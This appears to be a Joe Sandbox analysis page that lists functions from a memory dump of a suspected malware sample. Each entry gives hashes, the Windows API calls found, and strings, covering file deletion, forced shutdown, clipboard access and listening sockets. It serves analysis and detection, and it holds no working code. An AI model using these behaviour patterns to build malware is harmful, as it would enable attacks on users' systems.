Opcode ID: 6c8b374483d3b3a245b7f183f11a2063a3f2225b73af604501254de770c23767
Instruction ID: 69c4d2b10b8c41e69f7fcbc402fe0cf333c20db8751e573fed37f6bf3cd4b47f
Opcode Fuzzy Hash: 6c8b374483d3b3a245b7f183f11a2063a3f2225b73af604501254de770c23767
Instruction Fuzzy Hash: 6861CF38204305AFD300EF64D888F7A7BF8AF84764F148529F556972A2DB71DD46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A6698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A669BE
FindClose.KERNEL32(00000000), ref: 00A66A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A66A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A66A75

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00A66AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A66ADF

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00A66B32
%02d, xrefs: 00A66C00, 00A66C0A, 00A66C5A, 00A66CAA, 00A66CFA, 00A66D4A
%4d%02d%02d%02d%02d%02d, xrefs: 00A66B6A
%4d, xrefs: 00A66BB1
%03d, xrefs: 00A66DA2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 58546726b9c22a57f09ea0415bf42593d6aaaf8136046746f6925f7668c0dae9
Instruction ID: f4e624caf745f52821edfe642b919e0af31999f677126e9d2dcb8f5bde417f0f
Opcode Fuzzy Hash: 58546726b9c22a57f09ea0415bf42593d6aaaf8136046746f6925f7668c0dae9
Instruction Fuzzy Hash: 62D15EB2508304AFC310EBA4C991EBBB7FCAF98704F04491DF689D6191EB74DA44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A69642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A69663
GetFileAttributesW.KERNEL32(?), ref: 00A696A1
SetFileAttributesW.KERNEL32(?,?), ref: 00A696BB
FindNextFileW.KERNEL32(00000000,?), ref: 00A696D3
FindClose.KERNEL32(00000000), ref: 00A696DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00A696FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00A6974A
SetCurrentDirectoryW.KERNEL32(00AB6B7C), ref: 00A69768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A69772
FindClose.KERNEL32(00000000), ref: 00A6977F
FindClose.KERNEL32(00000000), ref: 00A6978F

Strings

*.*, xrefs: 00A696F5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: d7d5b165b690b24822ce9cefeb6c1fb140da07e96951c1c9d18b7f0daeb20416
Instruction ID: 45387b20a74f88e30100d68113c2f221c4cda9ddb59ccededebd3a80278284a4
Opcode Fuzzy Hash: d7d5b165b690b24822ce9cefeb6c1fb140da07e96951c1c9d18b7f0daeb20416
Instruction Fuzzy Hash: 4E31A032940619BADF14EFF4ED49AEF77BCAF49320F104565E815E2091EB34D9858F24

Uniqueness

Uniqueness Score: -1.00%

Function 00A6979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00A697BE
FindNextFileW.KERNEL32(00000000,?), ref: 00A69819
FindClose.KERNEL32(00000000), ref: 00A69824
FindFirstFileW.KERNEL32(*.*,?), ref: 00A69840
SetCurrentDirectoryW.KERNEL32(?), ref: 00A69890
SetCurrentDirectoryW.KERNEL32(00AB6B7C), ref: 00A698AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A698B8
FindClose.KERNEL32(00000000), ref: 00A698C5
FindClose.KERNEL32(00000000), ref: 00A698D5

Part of subcall function 00A5DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A5DB00

Strings

*.*, xrefs: 00A6983B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: e2e07ed7bbd1b7eafacafc94c56d4f02176e09382a8011ed16c1abb9fd54779f
Instruction ID: 3ed5e6bd1df1c4ac569c79dbcca90a3b35f2ad9499a5792258d0a425dc13f374
Opcode Fuzzy Hash: e2e07ed7bbd1b7eafacafc94c56d4f02176e09382a8011ed16c1abb9fd54779f
Instruction Fuzzy Hash: 84319032940619BADB10EFB4EC48ADF77BCAF4A320F144555E814A3191EB34DA85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2

Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A

FindFirstFileW.KERNEL32(?,?), ref: 00A5D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A5D1DD
MoveFileW.KERNEL32 ref: 00A5D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5D237

Part of subcall function 00A5D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00A5D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00A5D253
FindClose.KERNEL32(00000000), ref: 00A5D264

Strings

\*.*, xrefs: 00A5D0CD, 00A5D0D6, 00A5D0EB

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 5bad2299709a6723e71448bebd00af08ec72102c06607213de74b05a7a7f3784
Instruction ID: 42e36541c37130335b1ccb48af1e177526a34102d4b5667c588ee8fe9e5250e4
Opcode Fuzzy Hash: 5bad2299709a6723e71448bebd00af08ec72102c06607213de74b05a7a7f3784
Instruction Fuzzy Hash: 0D615B7180110DAECF15EBE0DA92AFDB7B5BF55341F208169E90677191EB30AF09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A6ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A6ED91
EmptyClipboard.USER32 ref: 00A6ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00A6EDAC
CloseClipboard.USER32 ref: 00A6EEA3

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b51a67bebc92dc8a330529bc25a6c7a8b838933486b6075698d1d3af92198379
Instruction ID: 9e251633ce1124f6719011a2e59c7111619471a9c987306ab7f10fa5c09fe988
Opcode Fuzzy Hash: b51a67bebc92dc8a330529bc25a6c7a8b838933486b6075698d1d3af92198379
Instruction Fuzzy Hash: 9F418E39204611AFE710DF55D888F69BBF5EF44328F14C0A9E4158B6A2D736EC42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
Part of subcall function 00A516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
Part of subcall function 00A516C3: GetLastError.KERNEL32 ref: 00A5174A

ExitWindowsEx.USER32(?,00000000), ref: 00A5E932

Strings

@, xrefs: 00A5E925
SeShutdownPrivilege, xrefs: 00A5E902
, xrefs: 00A5E95C
, xrefs: 00A5E920

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: b432a001864d7ad008a9c6bd9fd2143f96752fa8f7e16dd65c935d2141354c31
Instruction ID: 6b68c8b7b2cac1854c5ca88ed4982cf75ad291c22b7e691794e0e308e9c87e30
Opcode Fuzzy Hash: b432a001864d7ad008a9c6bd9fd2143f96752fa8f7e16dd65c935d2141354c31
Instruction Fuzzy Hash: 8201FE72A10211EFEB58A7B4AC86FBFB26CBB14752F150422FC13E21D2D5745D4886A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A71204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A71276
WSAGetLastError.WSOCK32 ref: 00A71283
bind.WSOCK32(00000000,?,00000010), ref: 00A712BA
WSAGetLastError.WSOCK32 ref: 00A712C5
closesocket.WSOCK32(00000000), ref: 00A712F4
listen.WSOCK32(00000000,00000005), ref: 00A71303
WSAGetLastError.WSOCK32 ref: 00A7130D
closesocket.WSOCK32(00000000), ref: 00A7133C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: b414eacacee8df57f650fad82b4471f493aba67ee7f65b383b3e7b88a2697e9d
Instruction ID: bad6ad6b13296f8269af6c8a339b9c4d7117e98953af63275dc3546babe9e466
Opcode Fuzzy Hash: b414eacacee8df57f650fad82b4471f493aba67ee7f65b383b3e7b88a2697e9d
Instruction Fuzzy Hash: 2B4186316001009FD710DF68C884B69B7E5BF86328F18C198E95A9F293C771ED86CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0997D Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A09A4E
GetSysColor.USER32 ref: 00A09B23
SetBkColor.GDI32(?,00000000), ref: 00A09B36

Strings

6ofs, xrefs: 00A4778D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Color$LongProcWindow
String ID: 6ofs
API String ID: 3131106179-1294211291
Opcode ID: cff79f149e790da2a0a26fa535a292ce95fa0d791b55e48472c14f3216c2196a
Instruction ID: 34df0467b1220a1a5d90c2d7df346d462adf1fbcf33f744514eee645f8be811e
Opcode Fuzzy Hash: cff79f149e790da2a0a26fa535a292ce95fa0d791b55e48472c14f3216c2196a
Instruction Fuzzy Hash: 84A1F770309488AEE728AB2CAD98E7F3AADDB86390B154109F512D65D3CB259D02D376

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2B9D4
_free.LIBCMT ref: 00A2B9F8
_free.LIBCMT ref: 00A2BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A93700), ref: 00A2BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A2BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC1270,000000FF,?,0000003F,00000000,?), ref: 00A2BC36
_free.LIBCMT ref: 00A2BD4B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: c0e2b9bf9d19b37025a8e6fe8fe190d95b33e2aee30311722117e2a166859b76
Instruction ID: 473d499039a074bee6312f231475f05682b7f0c8e849024b65c9fdf7cc89bf57
Opcode Fuzzy Hash: c0e2b9bf9d19b37025a8e6fe8fe190d95b33e2aee30311722117e2a166859b76
Instruction Fuzzy Hash: 30C12975A14225AFCB10DF6CAD41BEABBB8EF46350F14417AE491DB252E7309E418770

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2

Part of subcall function 00A5E199: GetFileAttributesW.KERNEL32(?,00A5CF95), ref: 00A5E19A

FindFirstFileW.KERNEL32(?,?), ref: 00A5D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5D481
FindClose.KERNEL32(00000000), ref: 00A5D498
FindClose.KERNEL32(00000000), ref: 00A5D4A1

Strings

\*.*, xrefs: 00A5D3F2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 42b7c4d23cfd66499cdf35d42481854150e58453b6c79618993497168c46b2ab
Instruction ID: 8ece1e6a3648b1af6a44e050ecefdb1cb74a09449f468952714e67f380c4e115
Opcode Fuzzy Hash: 42b7c4d23cfd66499cdf35d42481854150e58453b6c79618993497168c46b2ab
Instruction Fuzzy Hash: 8F318971008349AFC210EF64D891ABFB7F8BE91355F404A2DF9D592191EB30AA0D8B62

Uniqueness

Uniqueness Score: -1.00%

Function 00A2E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00A2E645

Strings

1#SNAN, xrefs: 00A2F844
1#QNAN, xrefs: 00A2F84B
1#IND, xrefs: 00A2F83D
1#INF, xrefs: 00A2F852

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d0dc48b9f8f81b75b338b77a7f3f52145fe6ad674d65fdeb1cf9994c78790912
Instruction ID: f9d45dabf7253ea24a824833f57759dfa0e27a1eb761bb2364eb81a8c44de0e4
Opcode Fuzzy Hash: d0dc48b9f8f81b75b338b77a7f3f52145fe6ad674d65fdeb1cf9994c78790912
Instruction Fuzzy Hash: A1C21772E086288FDB25CF28AD407EAB7B5EB49305F1541FAD84DE7240E775AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 00A6648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A664DC
CoInitialize.OLE32(00000000), ref: 00A66639
CoCreateInstance.OLE32(00A8FCF8,00000000,00000001,00A8FB68,?), ref: 00A66650
CoUninitialize.OLE32 ref: 00A668D4

Strings

.lnk, xrefs: 00A664BA, 00A66524, 00A665E0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: cead2abb92336f5de0e65b52793e7f86757e2d7c1f5543a2da7a225c490df049
Instruction ID: 40bb0c573d26ce185e9a3606dacc1f2cddaf29c27e4b6de0157828ffeb5a363f
Opcode Fuzzy Hash: cead2abb92336f5de0e65b52793e7f86757e2d7c1f5543a2da7a225c490df049
Instruction Fuzzy Hash: D6D13871508305AFC314EF24C981A6BB7E8FFD8704F14496DF5968B2A1EB70E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A722DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A722E8

Part of subcall function 00A6E4EC: GetWindowRect.USER32(?,?), ref: 00A6E504

GetDesktopWindow.USER32 ref: 00A72312
GetWindowRect.USER32(00000000), ref: 00A72319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A72355
GetCursorPos.USER32(?), ref: 00A72381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A723DF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 4a8157ddc076ac2885e8765b0b63cc6241c5ede49012ae3d2c73b0890b34b8fe
Instruction ID: 82d1174c3c9390f282026440e6c05555646ecc18afa9da0648e2c50dd71fd007
Opcode Fuzzy Hash: 4a8157ddc076ac2885e8765b0b63cc6241c5ede49012ae3d2c73b0890b34b8fe
Instruction Fuzzy Hash: 3531D072504315AFDB20DF54DC49B5BBBAAFF84720F004919F9899B181DB34EA09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A69B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A69B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A69C8B

Part of subcall function 00A63874: GetInputState.USER32 ref: 00A638CB
Part of subcall function 00A63874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A63966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A69BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A69C75

Strings

*.*, xrefs: 00A69B5D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: ed4a6c20ab5cf485f807f1f4d8983e0aed0b39eaedb4605caf312b0316762d3e
Instruction ID: 137fd5289a01c50b6667498774318eab6a6aea69e2edebf324d58cbccdececbd
Opcode Fuzzy Hash: ed4a6c20ab5cf485f807f1f4d8983e0aed0b39eaedb4605caf312b0316762d3e
Instruction Fuzzy Hash: 93415F7190420AAFCF55EFA4C989AEEBBF8FF49350F244155F805A2191EB309E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A71806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A7307A
Part of subcall function 00A7304E: _wcslen.LIBCMT ref: 00A7309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A7185D
WSAGetLastError.WSOCK32 ref: 00A71884
bind.WSOCK32(00000000,?,00000010), ref: 00A718DB
WSAGetLastError.WSOCK32 ref: 00A718E6
closesocket.WSOCK32(00000000), ref: 00A71915

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 92521e4d2c5ce21d4cee4699b5609330ba17b3bc0fdbcd0cb240b519a0447a8f
